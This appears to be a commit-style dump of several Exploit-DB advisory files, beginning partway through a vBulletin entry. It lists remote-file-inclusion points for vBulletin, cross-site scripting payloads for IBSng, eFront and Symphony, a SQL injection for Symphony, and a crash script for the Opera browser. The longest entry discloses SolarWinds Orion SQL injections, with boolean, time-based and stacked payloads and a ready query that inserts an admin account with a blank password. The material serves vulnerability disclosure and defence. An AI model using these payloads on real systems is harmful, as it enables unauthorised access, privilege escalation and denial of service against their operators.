vBulletin 4.1.7 is vulnerable; other versions may also be affected.
http://www.example.com/vB1/api.php?api_script=[RFI]
http://www.example.com/vB1/payment_gateway.php?api[classname]=[RFI]
http://www.example.com/vB1/admincp/cronadmin.php?nextitem[filename]=[RFI]
http://www.example.com/vB1/admincp/diagnostic.php?match[0]=[RFI]
http://www.example.com/vB1/admincp/diagnostic.php?api[classname]=[RFI]
http://www.example.com/vB1/admincp/plugin.php?safeid=[RFI]
http://www.example.com/vB1/includes/class_block.php?file=[RFI]
http://www.example.com/vB1/includes/class_humanverify.php?chosenlib=[RFI]
http://www.example.com/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[RFI]
http://www.example.com/vB1/includes/functions.php?classfile=[RFI]
http://www.example.com/vB1/includes/functions_cron.php?nextitem[filename]=[RFI]
http://www.example.com/vB1/vb/vb.php?filename=[RFI]
http://www.example.com/vB1/install/includes/class_upgrade.php?chosenlib=[RFI]
http://www.example.com/vB1/packages/vbattach/attach.php?package=[RFI]
http://www.example.com/vB1/packages/vbattach/attach.php?path=[RFI]

7
platforms/php/webapps/36277.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/50468/info
IBSng is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/IBSng/util/show_multistr.php?str=[xss]

15
platforms/php/webapps/36278.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/50469/info
eFront is prone to multiple cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied input
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
eFront 3.6.10 build 11944 is vulnerable; other versions may also be affected.
http://example.com/administrator.php?ctg=%22%20stYle=%22x:expre/**/ssion(alert(9))%20&user=admin&op=dashboard
http://example.com/administrator.php?ctg=personal&user='%20stYle=x:expre/**/ssion(alert(9))%20ns='%20&op=dashboard
http://example.com/administrator.php?ctg=calendar&view_calendar=%22%20stYle=x:expre/**/ssion(alert(9))%20ns=%22
http://example.com/index.php?ctg=lesson_info&lessons_ID=2&course='%20stYle='x:expre/**/ssion(alert(9))

9
platforms/php/webapps/36280.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50470/info
Symphony is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Symphony versions prior to 2.2.4 are vulnerable.
http://example.com/symphony/publish/images/?filter='"--></style></script><script>alert(1)</script>

9
platforms/php/webapps/36281.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50470/info
Symphony is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Symphony versions prior to 2.2.4 are vulnerable.
http://example.com/symphony/publish/comments/?filter='+(SELECT+1+FROM+(SELECT+SLEEP(25))A)+'

58
platforms/windows/dos/36260.txt Executable file
View file

@ -0,0 +1,58 @@
source: http://www.securityfocus.com/bid/50421/info
The Opera Web Browser is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
Opera Web Browser 11.52 is vulnerable; other versions may also be affected.
<script>alert(/\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r/); </script>

142
platforms/windows/webapps/36262.txt Executable file
View file

@ -0,0 +1,142 @@
I found a couple SQL injection vulnerabilities in the core Orion service
used in most of the Solarwinds products (SAM, IPAM, NPM, NCM, etc…). This
service provides a consistent configuration and authentication layer across
the products.
To be exact, the vulnerable applications and versions are:
Network Performance Monitor -- < 11.5
NetFlow Traffic Analyzer -- < 4.1
Network Configuration Manager -- < 7.3.2
IP Address Manager -- < 4.3
User Device Tracker -- < 3.2
VoIP & Network Quality Manager -- < 4.2
Server & Application Monitor -- < 6.2
Web Performance Monitor -- < 2.2
At first glance, the injections are only available to admins, as the
requests used are on the Manage Accounts page. However, it seems there is
no real ACL check on the GetAccounts and GetAccountGroups endpoints of the
AccountManagement.asmx service, which means that even authenticating as
Guest allows for exploitation. By default, the Guest account has no
password and is enabled.
On both the GetAccounts and GetAccountGroups endpoints, the 'sort' and
'dir' parameters are susceptible to boolean-/time-based, and stacked
injections. By capturing the AJAX requests made by an admin user to these
endpoints, authenticating as Guest and replacing the admin cookie with the
Guest cookie, you can still make a successful request, and thus a
successful exploitation vector for any authenticated user.
Being a stacked injection, this becomes a privilege escalation at the very
least, as an attacker is able to insert their own admin user. A pull
request for a Metasploit module which should achieve this on any product
using the Orion service as the core authentication management system, using
the GetAccounts endpoint, has been made (
https://github.com/rapid7/metasploit-framework/pull/4836). By default, the
module attempts to authenticate as the Guest user with a blank password,
then exploit the SQL injection to insert a new admin with a blank password.
I am not sure if the non-trial versions allow you to specify your own SQL
server, but the trials install a SQL Server Express instance. The SQL user
that the application uses is not an administrator, and the xp_cmd_shell
stored procedure is unavailable.
Within the GetAccounts endpoint:
Parameter: dir (GET)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause
Payload: sort=Accounts.AccountID&dir=ASC,(SELECT (CASE WHEN (5791=5791)
THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 5791*(SELECT 5791 FROM
master..sysdatabases) END))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: sort=Accounts.AccountID&dir=ASC; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sort=Accounts.AccountID&dir=ASC WAITFOR DELAY '0:0:5'--
Parameter: sort (GET)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter
replace (original value)
Payload: sort=(SELECT (CASE WHEN (8998=8998) THEN
CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(73)+CHAR(68)
ELSE 8998*(SELECT 8998 FROM master..sysdatabases) END))&dir=ASC
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: sort=Accounts.AccountID; WAITFOR DELAY '0:0:5'--&dir=ASC
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sort=Accounts.AccountID WAITFOR DELAY '0:0:5'--&dir=ASC
Within the GetAccountGroups endpoint, very similar injection techniques are
available:
Parameter: dir (GET)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause
Payload: sort=Accounts.GroupPriority&dir=ASC,(SELECT (CASE WHEN
(8799=8799) THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 8799*(SELECT 8799 FROM
master..sysdatabases) END))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: sort=Accounts.GroupPriority&dir=ASC; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sort=Accounts.GroupPriority&dir=ASC WAITFOR DELAY '0:0:5'--
Parameter: sort (GET)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter
replace (original value)
Payload: sort=(SELECT (CASE WHEN (1817=1817) THEN
CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(71)+CHAR(114)+CHAR(111)+CHAR(117)+CHAR(112)+CHAR(80)+CHAR(114)+CHAR(105)+CHAR(111)+CHAR(114)+CHAR(105)+CHAR(116)+CHAR(121)
ELSE 1817*(SELECT 1817 FROM master..sysdatabases) END))&dir=ASC
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: sort=Accounts.GroupPriority; WAITFOR DELAY '0:0:5'--&dir=ASC
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sort=Accounts.GroupPriority WAITFOR DELAY '0:0:5'--&dir=ASC
An example injection to insert an admin user named notadmin with a blank
password using the 'dir' parameter would be:
ASC;insert into accounts values ('notadmin', '127-510823478-74417-8',
'/+PA4Zck3arkLA7iwWIugnAEoq4ocRsYjF7lzgQWvJc+pepPz2a5z/L1Pz3c366Y/CasJIa7enKFDPJCWNiKRg==',
'Feb 1 2100 12:00AM', 'Y', 'notadmin', 1, '', '', 1, -1, 8, -1, 4, 0, 0,
0, 0, 0, 0, 'Y', 'Y', 'Y', 'Y', 'Y', '', '', 0, 0, 0, 'N', 'Y', '', 1, '',
0, '');
This vulnerability was reported to Solarwinds on Dec 8th, 2014 and was
assigned the CVE identifier CVE-2014-9566. A coordinated disclosure date of
Feb 24th, 2015 was chosen by both parties. I would like to thank Rob Hock,
Group Product Manager Network Management at Solarwinds for the easy
coordination (you should still have a bug bounty though!).
i can has crazy cool vuln name, yaes? wat about Polarbends, or Molarfriends?
i dub thee Molarfriends vulnerability. wheres my markketing tem...
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website